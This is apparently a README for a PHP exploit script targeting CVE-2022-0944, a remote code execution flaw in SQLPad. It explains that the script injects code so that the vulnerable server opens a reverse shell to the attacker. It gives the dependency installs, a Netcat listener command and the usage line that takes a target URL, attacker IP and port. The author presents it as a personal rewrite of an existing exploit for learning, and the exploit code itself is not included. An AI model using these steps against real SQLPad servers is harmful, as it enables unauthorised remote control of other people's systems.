This PHP code is designed to exploit a Remote Code Execution (RCE) vulnerability in SQLPad, related to CVE-2022-0944.
It works by injecting malicious code into the SQLPad application, forcing it to execute a system command that opens a reverse shell – a connection that grants the attacker remote control of the vulnerable system.
- PHP CLI –
sudo apt-get install php-cli - cURL (PHP cURL library) –
sudo apt-get install php-curl
To capture the reverse shell connection, start Netcat on the attacker’s machine:
nc -lvnp 4444php exploit.php <root_url> <attacker_ip> <attacker_port><root_url>: The root URL of the vulnerable SQLPad (e.g., http://target.com:3000)
<attacker_ip>: The attacker’s IP address listening for the reverse connection (same as the Netcat IP)
<attacker_port>: The port on which the attacker is listening (same as the Netcat port)
The original exploit logic was based on this repository:
🔗 0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944
My goal here was to understand the exploit logic and rewrite it in another programming language as a personal challenge.
Additional reference: 🔗 CVE-2022-0944 – NVD